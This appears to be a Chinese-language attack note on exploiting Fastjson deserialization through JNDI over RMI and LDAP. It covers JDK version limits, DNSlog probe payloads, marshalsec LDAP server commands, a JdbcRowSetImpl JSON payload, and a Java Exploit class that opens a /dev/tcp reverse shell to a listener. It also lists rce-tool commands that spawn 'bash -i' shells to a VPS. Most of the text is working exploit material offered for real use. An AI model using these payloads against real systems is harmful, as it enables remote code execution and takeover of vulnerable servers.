Fastjson 是一个 Java 库，可以将 Java 对象转换为 JSON 格式，当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象，即使是一些预先存在的没有源码的对象。

1.Fastjson提供了反序列化功能，允许用户在输入json串时通过"@type"键对应的value值指定任意反序列化类名。2.Fastjson自定义的反序列化机制会使用反射生成上述指定类的实例化对象，并自动调用该对象的setter方法及部分getter方法。

1.反序列化常用的两种利用方式，一种是基于rmi，一种是基于ldap。2.RMI是一种行为，指的是Java远程方法调用。3.ldap指轻量级目录服务协议。4.JNDI是一个接口，在这个接口下会有多种目录系统服务的实现，通过名称等去找到相关的对象，并把它下载到客户端中来。

基于rmi的利用方式：适用jdk版本：JDK 6u132，JDK 7u131，JDK 8u121之前；在jdk8u122的时候，加了反序列化白名单的机制，关闭了rmi远程加载代码。基于ldap的利用方式，适用jdk版本：JDK 11.0.1、8u191、7u201、6u211之前。在Java 8u191更新中，Oracle对LDAP向量设置了相同的限制，并发布了CVE-2018-3149，关闭了JNDI远程类加载。可以看到ldap的利用范围是比rmi要大的，实战情况下推荐使用ldap方法进行利用。

{"@type":"java.net.Inet4Address","val":"dnslog"}{"@type":"java.net.Inet6Address","val":"dnslog"}{"zeo":{"@type":"java.net.Inet4Address","val":"dnslog"}}

{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}

{{"@type":"java.net.URL","val":"dnslog"}:"x"}

{"@type":"java.net.URL","val":"http://dnslog"}{{"@type":"java.net.URL","val":"http://dnslog"}:"x"}

{"@type":"java.net.InetAddress","val":"dnslog"}

{"@type":"java.net.Inet4Address","val":"dnslog"}{"@type":"java.net.Inet6Address","val":"dnslog"}{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}Set[{"@type":"java.net.URL","val":"http://dnslog"}]Set[{"@type":"java.net.URL","val":"http://dnslog"}{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}{{"@type":"java.net.URL","val":"http://dnslog"}:0

https://github.com/pen4uin/awesome-java-security/tree/main/alibaba%20fastjson[{"@type":"java.net.CookiePolicy"},{"@type":"java.net.Inet4Address","val":"ydk3cz.dnslog.cn"}]

工具地址:https://github.com/mbechler/marshalsec.git

java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://192.168.19.128:4444/ldap服务默认监听在9999端口，

python -m SimpleHttpServer 4444

import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader; public class Exploit{    public Exploit() throws Exception {        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/192.168.19.130/5555;cat <&5 | while read line;do $line 2>&5 >&5; done"});        InputStream is = p.getInputStream();        BufferedReader reader = new BufferedReader(new InputStreamReader(is));         String line;        while((line = reader.readLine()) != null) {            System.out.println(line);        }         p.waitFor();        is.close();        reader.close();        p.destroy();    }    public static void main(String[] args) throws Exception {    }
//在192.168.19.128服务器上监听5555端口， nc -lvvp 5555 //等待反弹过来的shell

请求需要改为POST，Content-Type: application/json

{    "name": {        "@type": "java.lang.Class",        "val": "com.sun.rowset.JdbcRowSetImpl"    },    "x": {        "@type": "com.sun.rowset.JdbcRowSetImpl",        "dataSourceName": "ldap://192.168.19.128:9999/exp",        "autoCommit": true    }}

注意：1.json数据中的vps端口为jar包开放的端口，不是http服务的端口，nc监听的为bash命令的端口。2.对用jar和json数据中的协议要一致（rmi与ldap）。

 https://github.com/pt001/fastjson_rce_tool

 java -cp fastjson_tool.jar fastjson.HLDAPServer vps 8888 "curl dnslog"
 java -cp fastjson_tool.jar fastjson.HLDAPServer vps 8888 "bash=/bin/bash -i >& /dev/tcp/vps/5555 0>&1"

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

https://blog.csdn.net/u012990687/article/details/110358442https://www.freebuf.com/articles/web/283585.htmlhttps://github.com/safe6Sec/Fastjson